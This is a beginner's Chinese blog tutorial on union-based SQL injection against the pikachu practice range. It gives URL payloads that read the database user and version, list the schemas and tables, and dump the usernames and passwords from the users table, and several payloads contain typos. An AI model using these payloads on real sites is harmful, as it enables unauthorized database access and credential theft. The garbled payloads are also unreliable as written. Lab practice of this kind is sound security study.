当前位置: 首页 > news >正文

【新手初学】读取数据库数据

利用注入点让SQL注入语句执行读取数据库数据相关的操作!

以下均以pikachu靶场的字符型注入为例进行介绍说明

一、读取用户名,数据库版本信息

在原URL后面添加如下代码:

   ' union select user(),version()--+

效果: 

补充:判断查询的字段个数order by

这时,就需要在相应环境下进行测试判断:主要是使用 order by 来判断

在后面添加1,2,3,4,5,6....进行测试,直到不再报错!就判断出了其查询字段个数

如下:

 二、读取mysql所有库名

在原URL后面添加如下语句:

‘ union select 1,group_concat(schema_name) from information_schema,schemata+--+

 效果:

三、读取pikachu库的所有表名

在原URL后面添加如下语句:

’unnion select 1,group_concat(table_name) from information_schema.tables where table_schema=database+--+

效果:

 

四、读取所有字段数据

在原URL后面添加如下语句:

‘ union select 1,group_concat(id,0x7c,username,0x7c,password,0x7c,level,0x7c) from users+--+

效果:

相关文章:

  • 服务器数据恢复—多块硬盘出现坏道导致raid5阵列崩溃的数据恢复案例
  • linux 常见命令使用介绍
  • python每日十题(13)
  • CentOS 7 部署RuoYi 项目
  • MES系统需要采集的数据及如何采集
  • Problem D: 抽象类
  • 【大模型】激活函数之SwiGLU详解
  • Windows 10更新失败解决方法
  • Linux 下安装和使用 Jupyter Notebook
  • 安全性测试(Security Testing)
  • CMake 简单使用总结
  • MCP 智能聊天助手示例项目
  • Day31-代码随想录-最大二叉树654+合并二叉树617+二叉搜索树中的搜索700
  • C 预处理器:编译前的文本魔法
  • 【安当产品应用案例100集】042-基于安当KADP实现机密文件安全流转
  • 一篇就够!Windows上Docker Desktop安装 + 汉化完整指南(包含解决wsl更新失败方案)
  • 状态码返回
  • 2025 年前端新趋势:拥抱 Web Component 与性能优化
  • 智能家居赋能宠物经济:未来宠物行业的另一片蓝海
  • 优雅处理拼音输入:jQuery实现中文输入法状态检测的最佳实践
  • 优秀企业网站首页/网站买卖
  • 网站服务器环境搭建/搜索关键词排名工具
  • the7.3 wordpress/windows优化工具
  • 信誉好的徐州网站建设/查销售数据的网站
  • 企业网站建设的内容/东莞百度快速排名优化
  • 长春高铁站/app开发自学